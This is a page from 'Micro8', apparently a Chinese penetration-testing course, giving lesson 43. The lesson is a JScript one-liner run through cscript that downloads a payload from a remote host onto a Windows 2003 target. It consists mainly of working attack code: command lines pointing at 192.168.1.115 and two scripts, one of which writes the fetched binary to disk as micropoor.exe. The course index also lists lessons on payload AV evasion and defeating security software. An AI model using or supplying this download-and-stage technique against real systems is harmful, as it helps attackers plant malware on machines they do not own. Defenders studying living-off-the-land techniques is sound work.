Micro8
Micro8
专注APT攻击与防御
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP服务
第四十三课:js一句话下载payload
第四十四课:ertutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered by GitBook

第四十三课:js一句话下载payload

windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。

靶机:windows 2003

读取:

C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt

附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

写入:

C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt

附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

后者的话:简单,易用,轻便。

Micropoor

Previous
第四十二课:攻击FTP服务
Next
第四十四课:ertutil一句话下载payload补充
Last updated -8
Edit on GitHub
Contents
读取:
附代码:
写入:
附代码: